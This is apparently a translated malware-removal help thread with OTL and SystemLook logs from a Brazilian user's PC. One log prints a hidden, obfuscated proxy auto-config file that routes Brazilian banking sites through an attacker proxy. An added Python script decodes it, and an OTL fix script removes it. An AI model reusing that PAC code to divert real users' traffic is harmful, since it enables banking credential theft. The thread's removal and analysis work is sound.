"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010

"{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010

"{90140000-0019-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010

"{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010

"{90140000-001B-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010

"{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010

"{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010

"{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010

"{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUS_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010

"{90140000-0044-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010

"{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{4560037C-E356-444A-A015-D21F487D809E}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010

"{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010

"{90140000-00BA-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010

"{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUS_{4560037C-E356-444A-A015-D21F487D809E}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010

"{90140000-0117-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper

"{BCDB856C-D247-4DEE-9132-89C02F4D6B8C}_is1" = Sothink SWF Decompiler

"{FA0BBB87-91A1-4BFD-9005-EB058BBA0E14}_is1" = StreamTransport version: 1.0.2.2171

"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX

"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin

"avast" = avast! Free Antivirus

"BSPlayerf" = BS.Player FREE

"BSPlayerp" = BS.Player PRO

"CCleaner" = CCleaner

"DAEMON Tools Lite" = DAEMON Tools Lite

"Download Accelerator Plus (DAP)" = Download Accelerator Plus (DAP)

"FormatFactory" = FormatFactory 3.1.1

"Foxit Reader_is1" = Foxit Reader

"KLiteCodecPack_is1" = K-Lite Codec Pack 9.1.0 (Full)

"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile

"Mozilla Firefox 20.0.1 (x86 pt-BR)" = Mozilla Firefox 20.0.1 (x86 pt-BR)

"MozillaMaintenanceService" = Mozilla Maintenance Service

"Office14.PROPLUS" = Microsoft Office Professional Plus 2010

"PotPlayer" = Daum PotPlayer 1.5.37776

"Quake III Arena" = Quake III Arena

"Samsung ML-1860 Series" = Samsung ML-1860 Series

"Samsung Printer Live Update" = Samsung Printer Live Update

"Software Plate" =

"uTorrent" = µTorrent

"VLC media player" = VLC media player 2.0.4

"Winamp" = Winamp

"WinRAR archiver" = WinRAR 4.10 (32-bit)

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"Flux" = F.lux

"Google Chrome" = Google Chrome

========== Last 20 Event Log Errors ==========

[ Application Events ]

Error - 10/11/2013 00:49:17 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:45:01 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:45:52 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:55:26 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:56:18 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 17/11/2013 09:19:09 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: gmer.exe, versão: 2.1.19163.0, carimbo

de hora: 0x515d31f0 Nome do módulo de falhas: gmer.exe, versão: 2.1.19163.0, carimbo

de hora: 0x515d31f0 Código de exceção: 0xc0000005 Deslocamento com falha: 0x00012288

Identificação

do processo com falha: 0x1368 Hora de início do aplicativo com falha: 0x01cee396f99c4ac6

Caminho

do aplicativo com falha: C:\Users\2011\Desktop\gmer\gmer.exe FCaminho do módulo

de falhas: C:\Users\2011\Desktop\gmer\gmer.exe Identificação do Relatório: d726a06d-4f8a-11e3-ba19-00188bdfba05

Error - 22/11/2013 20:41:44 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0x1500 Hora de início do aplicativo

com falha: 0x01cee7e4c37ddea8 Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 064d17e0-53d8-11e3-b2ec-00188bdfba05

Error - 22/11/2013 20:42:52 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0x17cc Hora de início do aplicativo

com falha: 0x01cee7e4eec329da Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 2e895d72-53d8-11e3-b2ec-00188bdfba05

Error - 22/11/2013 20:44:37 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0x4c4 Hora de início do aplicativo

com falha: 0x01cee7e52e23b19b Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 6db5b510-53d8-11e3-b2ec-00188bdfba05

Error - 22/11/2013 21:00:02 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0xcbc Hora de início do aplicativo

com falha: 0x01cee7e75540a71f Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 94aafdbf-53da-11e3-b2ec-00188bdfba05

Error - 24/11/2013 15:56:21 | Computer Name = 2011_PC | Source = Application Hang | ID = 1002

Description = O programa DAP.exe versão 10.0.5.1 parou de interagir com o Windows

e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique

o histórico de problemas no painel de controle da Central de Ações. ID de Processo:

eb8 Hora de Início: 01cee9406a085d7f Hora de Término: 72 Caminho do Aplicativo: C:\Program

Files\DAP\DAP.exe Id do Relatório: 7a167df4-5542-11e3-ba91-00188bdfba05

[ System Events ]

Error - 12/11/2013 20:10:35 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 13/11/2013 20:35:34 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 15/11/2013 06:15:07 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 15/11/2013 20:58:24 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 16/11/2013 06:46:54 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 16/11/2013 14:46:31 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 16/11/2013 21:44:14 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 17/11/2013 04:54:35 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 17/11/2013 08:30:37 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 17/11/2013 08:32:40 | Computer Name = 2011_PC | Source = DCOM | ID = 10010

Description =

< End of report >


Dear manoelvalerio

Download SystemLook to your desktop.

Alternative link

  • Double-click the icon 4119586963_6274067071_o.gif
  • Click Run;
  • Copy (ctrl+c) the content below:

:contents
C:\ProgramData\ppctrl.dat

And paste (ctrl+v) it into the space indicated in the image:

4120361504_f66dd92e95_o.jpg

  • Click 4119586997_32a5666660_o.jpg
  • Wait;
  • When it finishes, the scan log will open;
  • Click 4120361454_3c264d5fca_o.jpg
  • Post the whole content in your next reply.

Note:
The log can also be found on the desktop under the name:
SystemLook.txt

Cheers :D


Thanks for the help, Diego.

Here is the log.

Manoel.

SystemLook 30.07.11 by jpshortstuff

Log created at 14:06 on 30/11/2013 by 2011

Administrator - Elevation successful

========== contents ==========

C:\ProgramData\ppctrl.dat - Opened succesfully.

function FindProxyForURL(UU, HSY)
{
  var HH=String.fromCharCode(104,115,98,99,46,99,111,109,46,98,114);
  var B=String.fromCharCode(98,98,46,99,111,109,46,98,114);
  var BD=String.fromCharCode(98,97,110,99,111,100,111,98,114,97,115,105,108,46,99,111,109,46,98,114);
  var DD=String.fromCharCode(119,46,98,114,97,100,101,115,99,111,46,99,111,109,46,98,114);
  var DDD=String.fromCharCode(98,114,97,100,101,115,99,111,112,114,105,109,101,46,99,111,109,46,98,114);
  var I=String.fromCharCode(105,116,97,117,46,99,111,109,46,98,114);
  var iclass=String.fromCharCode(105,116,97,117,117,110,105,99,108,97,115,115,46);
  var AZ=String.fromCharCode(99,97,105,120,97,46,99,111,109,46,98,114);
  var AZA=String.fromCharCode(119,46,99,97,105,120,97,46,103,111,118,46,98,114);
  var AZB=String.fromCharCode(99,101,102,46,99,111,109,46,98,114);
  var BNN=String.fromCharCode(119,46,98,97,110,101,115,101,46,99,111,109,46,98,114);
  var SRR=String.fromCharCode(119,46,115,101,114,97,115,97,46,99,111,109,46,98,114);
  var AA=String.fromCharCode(97,97,112,106,46,98,98,46,99,111,109);
  var pone=String.fromCharCode(80);
  var ptwo=String.fromCharCode(82);
  var ptthre=String.fromCharCode(79);
  var ptfor=String.fromCharCode(88);
  var ptfve=String.fromCharCode(89);
  var h=pone+ptwo+ptthre+ptfor+ptfve+String.fromCharCode(32,119,119,119,46,115,117,98,117,114,103,97,116,111,114,121,98,114,46,99,111,109,58,56,48);
  var L=String.fromCharCode(108,105,110,104,97,100,101,102);
  var C=pone+ptwo+ptthre+ptfor+ptfve+String.fromCharCode(32,49,50,55,46,48,46,48,46,49);
  if (shExpMatch(UU,"*"+AA+"*")){
    return "DIRECT";
  }
  if (shExpMatch(UU,"*"+B+"*")||shExpMatch(UU,"*"+BD+"*")||shExpMatch(UU,"*"+iclass+"*")||
      shExpMatch(UU,"*"+DDD+"*")||shExpMatch(UU,"*"+HH+"*")||shExpMatch(UU,"*"+DD+"*")||
      shExpMatch(UU,"*"+I+"*")||shExpMatch(UU,"*"+BNN+"*")||shExpMatch(UU,"*"+SRR+"*")||
      shExpMatch(UU,"*"+AZ+"*")||shExpMatch(UU,"*"+AZA+"*")||shExpMatch(UU,"*"+AZB+"*")){
    return h;
  }
  if (shExpMatch(UU,"*"+L+"*")) {return C;}
  return "DIRECT";
}

-= EOF =-

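To triage a PAC file like the one in the SystemLook log above, an analyst wants to know which hosts it diverts and where. The Python script below is an added example written for this thread; it is not part of the original posts and not SystemLook or OTL code. It undoes the String.fromCharCode obfuscation, resolves the variable concatenations, and lists each rule's hostname patterns together with the proxy string the function returns for them. The embedded PAC_EXCERPT is a trimmed copy of the ppctrl.dat contents posted above (same structure, fewer variables); the function names and regular expressions are the example's own.

```python
import re
from typing import Dict, List

# Excerpt of the obfuscated PAC file posted above as C:\ProgramData\ppctrl.dat,
# trimmed to a few of its variable definitions. The rule structure is unchanged;
# the full file follows exactly the same pattern.
PAC_EXCERPT = """
function FindProxyForURL(UU, HSY)
{
var HH=String.fromCharCode(104,115,98,99,46,99,111,109,46,98,114);
var B=String.fromCharCode(98,98,46,99,111,109,46,98,114);
var AA=String.fromCharCode(97,97,112,106,46,98,98,46,99,111,109);
var pone=String.fromCharCode(80);
var ptwo=String.fromCharCode(82);
var ptthre=String.fromCharCode(79);
var ptfor=String.fromCharCode(88);
var ptfve=String.fromCharCode(89);
var h=pone+ptwo+ptthre+ptfor+ptfve+String.fromCharCode(32,119,119,119,46,115,117,98,117,114,103,97,116,111,114,121,98,114,46,99,111,109,58,56,48);
var L=String.fromCharCode(108,105,110,104,97,100,101,102);
var C=pone+ptwo+ptthre+ptfor+ptfve+String.fromCharCode(32,49,50,55,46,48,46,48,46,49);
if (shExpMatch(UU,"*"+AA+"*")){
return "DIRECT";
}
if (shExpMatch(UU,"*"+B+"*")||shExpMatch(UU,"*"+HH+"*")){
return h;
}
if (shExpMatch(UU,"*"+L+"*")) {return C;}
return "DIRECT";
}
"""

# Regexes for the three constructs this PAC uses (example's own, not a general JS parser).
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]*)\)")
VARDEF = re.compile(r"var\s+(\w+)\s*=\s*(.+?);")
SHEXP = re.compile(r'shExpMatch\(\w+,\s*((?:"[^"]*"|\w+)(?:\s*\+\s*(?:"[^"]*"|\w+))*)\)')
RULE = re.compile(r"\bif\s*\((.*?)\)\s*\{\s*return\s+([^;]+);", re.DOTALL)


def decode_charcodes(text: str) -> str:
    """Replace every String.fromCharCode(...) call with the quoted literal it builds."""
    def repl(m: "re.Match[str]") -> str:
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        literal = "".join(chr(c) for c in codes)
        return '"' + literal.replace("\\", "\\\\").replace('"', '\\"') + '"'
    return FROMCHARCODE.sub(repl, text)


def eval_concat(expr: str, env: Dict[str, str]) -> str:
    """Evaluate a JS expression made only of string literals and known variables joined by +."""
    parts: List[str] = []
    for tok in expr.split("+"):
        tok = tok.strip()
        if len(tok) >= 2 and tok.startswith('"') and tok.endswith('"'):
            parts.append(tok[1:-1])
        elif tok in env:
            parts.append(env[tok])
        else:
            raise ValueError(f"unsupported token in PAC: {tok!r}")
    return "".join(parts)


def resolve_vars(decoded: str) -> Dict[str, str]:
    """Evaluate the var definitions in order, so later ones can reuse earlier ones."""
    env: Dict[str, str] = {}
    for name, expr in VARDEF.findall(decoded):
        env[name] = eval_concat(expr, env)
    return env


def extract_rules(decoded: str, env: Dict[str, str]) -> List[Dict[str, object]]:
    """Return one entry per if/return block: the URL patterns tested and the action returned."""
    rules = []
    for cond, ret in RULE.findall(decoded):
        patterns = [eval_concat(p, env) for p in SHEXP.findall(cond)]
        rules.append({"patterns": patterns, "action": eval_concat(ret.strip(), env)})
    return rules


def analyze_pac(pac_text: str) -> Dict[str, object]:
    """Decode the PAC and summarise which host patterns are sent to which proxy."""
    decoded = decode_charcodes(pac_text)
    env = resolve_vars(decoded)
    rules = extract_rules(decoded, env)
    proxied = [r for r in rules if str(r["action"]).upper().startswith("PROXY")]
    proxies = sorted({str(r["action"]) for r in proxied})
    hijacked = sorted({p.strip("*") for r in proxied for p in r["patterns"]})
    return {"env": env, "rules": rules, "proxies": proxies, "hijacked": hijacked}


if __name__ == "__main__":
    result = analyze_pac(PAC_EXCERPT)
    for rule in result["rules"]:
        print(f"{rule['patterns']} -> {rule['action']}")
    print("proxies:", result["proxies"])
    print("diverted host patterns:", result["hijacked"])
```

Run over the full ppctrl.dat contents above, the script shows that URLs containing the Brazilian bank domains (and serasa) are answered with `PROXY www.suburgatorybr.com:80`, so the browser routes those sessions through a proxy the attacker controls, while URLs containing `linhadef` get `PROXY 127.0.0.1`, effectively blocking them; everything else goes DIRECT. This is why the fix in the next reply removes both the Firefox `network.proxy.autoconfig_url` preference and the PAC file itself rather than only the detected JavaScript.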

Dear manoelvalerio

Again with OTL

  • Double-click the icon 3984478580_7ed4cabc45_o.gif
  • Copy and paste the content below into the space right after 5369460409_ee749edc8e_m.jpg

:OTL
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}:"URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1
FF - prefs.js..network.proxy.autoconfig_url: "file:///C:\\ProgramData\\ppctrl.dat"
FF - prefs.js..network.proxy.http: "189.112.117.5"
[2013/08/26 13:12:10 | 000,000,004 | ---- | C] () -- C:\ProgramData\98
[2013/08/03 16:37:56 | 000,002,006 | -H-- | C] () -- C:\ProgramData\ppctrl.dat
[2013/08/03 16:37:55 | 000,000,004 | ---- | C] () -- C:\ProgramData\99
[2013/08/03 16:37:47 | 000,000,000 | ---- | C] () -- C:\ProgramData\0
@Alternate Data Stream - 128 bytes -> C:\ProgramData\TEMP:56E2E879

:Commands
[purity]
[emptyflash]
[createrestorepoint]
[emptytemp]

  • Click the button 5370056394_358505935a_m.jpg
  • When it reboots a window will appear; click Run;
  • Save (File > Save As) the log to the desktop under any name you like;
  • Post the content of that log in your next reply.
  • Attention: if you close the log without saving it first, it will be lost.
  • Open OTL again and click the button 5370056476_bf9f840a51_m.jpg
  • Do not interrupt the scan under any circumstances;
  • When it finishes, OTL.txt will be generated;
  • Post this generated log too in your next reply.

Note: If you happen to lose the log after the computer restarts, you can find it in the folder C:\_OTL\Moved Files

Cheers :D


Hi Diego. Here are the logs.

Thanks for your attention!

All processes killed

========== OTL ==========

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.

Registry key HKEY_USERS\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.

Prefs.js: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1 removed from extensions.enabledAddons

Prefs.js: "file:///C:\\ProgramData\\ppctrl.dat" removed from network.proxy.autoconfig_url

Prefs.js: "189.112.117.5" removed from network.proxy.http

C:\ProgramData\98 moved successfully.

C:\ProgramData\ppctrl.dat moved successfully.

C:\ProgramData\99 moved successfully.

C:\ProgramData\0 moved successfully.

ADS C:\ProgramData\TEMP:56E2E879 deleted successfully.

========== COMMANDS ==========

[EMPTYFLASH]

User: 2011

->Flash cache emptied: 764 bytes

User: All Users

User: Default

User: Default User

User: Public

User: Todos os Usuários

User: Usuário Padrão

Total Flash Files Cleaned = 0,00 mb

Restore point Set: OTL Restore Point

[EMPTYTEMP]

User: 2011

->Temp folder emptied: 15500177 bytes

->Temporary Internet Files folder emptied: 804600 bytes

->Java cache emptied: 7368973 bytes

->FireFox cache emptied: 298727431 bytes

->Google Chrome cache emptied: 313046209 bytes

->Flash cache emptied: 0 bytes

User: All Users

User: Default

->Temp folder emptied: 0 bytes

->Temporary Internet Files folder emptied: 0 bytes

User: Default User

->Temp folder emptied: 0 bytes

->Temporary Internet Files folder emptied: 0 bytes

User: Public

User: Todos os Usuários

User: Usuário Padrão

->Temp folder emptied: 0 bytes

->Temporary Internet Files folder emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes

%systemroot% .tmp files removed: 0 bytes

%systemroot%\System32 .tmp files removed: 0 bytes

%systemroot%\System32\drivers .tmp files removed: 0 bytes

Windows Temp folder emptied: 847698 bytes

RecycleBin emptied: 35659609 bytes

Total Files Cleaned = 641,00 mb

OTL by OldTimer - Version 3.2.69.0 log created on 12042013_204351

Files\Folders moved on Reboot...

File move failed. C:\Windows\temp\_avast_\Webshlock.txt scheduled to be moved on reboot.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

-----------------------------------------------

OTL logfile created on: 04/12/2013 20:49:25 - Run 2

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16736)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 1,11 Gb Available Physical Memory | 55,36% Memory free

4,00 Gb Paging File | 2,83 Gb Available in Paging File | 70,88% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 104,56 Gb Free Space | 44,93% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

PRC - [2013/11/08 22:36:33 | 003,568,312 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastUI.exe

PRC - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe

PRC - [2012/11/23 00:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe

PRC - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) -- C:\Arquivos de Programas\Software Plate\svcgdp.exe

PRC - [2011/02/25 03:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe

PRC - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Modules (No Company Name) ==========

MOD - [2013/11/14 09:29:31 | 000,399,312 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ppGoogleNaClPluginChrome.dll

MOD - [2013/11/14 09:29:30 | 013,582,800 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\PepperFlash\pepflashplayer.dll

MOD - [2013/11/14 09:29:29 | 004,055,504 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\pdf.dll

MOD - [2013/11/14 09:28:37 | 000,702,416 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\libglesv2.dll

MOD - [2013/11/14 09:28:36 | 000,099,792 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\libegl.dll

MOD - [2013/11/14 09:28:34 | 001,619,408 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ffmpegsumo.dll

MOD - [2013/10/21 14:12:35 | 019,336,120 | ---- | M] () -- C:\Arquivos de Programas\AVAST Software\Avast\libcef.dll

MOD - [2011/03/17 00:11:16 | 004,297,568 | ---- | M] () -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Arquivos de Programas\Microsoft Office\Office14\1033\GrooveIntlResource.dll

MOD - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Services (SafeList) ==========

SRV - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2013/10/09 00:56:37 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013/10/05 22:41:26 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013/06/21 11:57:12 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2013/05/27 02:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) [Auto | Running] -- C:\Arquivos de Programas\Software Plate\svcgdp.exe -- (svcgdp)

SRV - [2010/12/27 23:50:30 | 031,124,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)

SRV - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

